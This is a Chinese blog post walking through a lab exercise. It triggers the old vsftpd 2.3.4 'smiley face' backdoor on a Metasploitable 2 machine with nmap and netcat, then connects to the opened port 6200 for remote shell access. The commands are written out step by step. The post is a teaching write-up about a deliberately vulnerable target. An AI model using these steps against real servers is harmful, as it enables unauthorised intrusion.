kali渗透测试之远程控制:通过激活靶机Metasploitable 2中的笑脸漏洞使其开启6200端口进行远程控制

本文介绍了如何通过Nmap扫描发现Metasploitable2的6200端口漏洞,使用Netcat进行远程控制的过程,展示了渗透测试的基本步骤。尽管VSFTPD漏洞已修复,但对于学习者仍是实践的好例子。
摘要由CSDN通过智能技术生成

远程控制:为什么6200端口变成了一个“后门”

测试工具:Netcat(瑞士军刀)
扫描工具:Nmap 7.94

查看靶机Metasploitable 2 ip

使用指令ifconfig
使用指令ifconfig查询到靶机IP为192.168.85.132

在kali中使用Namp对靶机端口进行扫描

使用指令nmap 192.168.85.132
在这里插入图片描述
可观察到21端口开放

kali中使用netcat连接靶机进行远程控制

使用指令nc ip port 连接即:nc 192.168.85.132 21
连接上后运用语法user 内容随意:)激活笑脸漏洞,pass 随意输入,即可打开靶机中的6200端口
在这里插入图片描述

使用nmap测试靶机6200端口开启情况

使用指令nmap -p port ip来查询:nmap -p 6200 192.168.85.132
在这里插入图片描述
可以观察到此时靶机的6200端口已经开启

kali中使用netcat通过6200端口连接靶机进行远程控制

使用指令 nc ip port实现 nc 192.168.85.132 6200
在这里插入图片描述
连接上后,即可通过一系列查询指令,拿到我们想要的东西,至此该渗透完成。

小结

1.通过本次实验让我对渗透的流程有了一个具象的了解,通过简单的漏洞复现让我感受到了渗透的魅力
2.虽然vsftpd-2.3.4已经是一个非常久远的漏洞了,也早已被修复,但用来给初学渗透的小白们用来做练习是个不错的选择

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值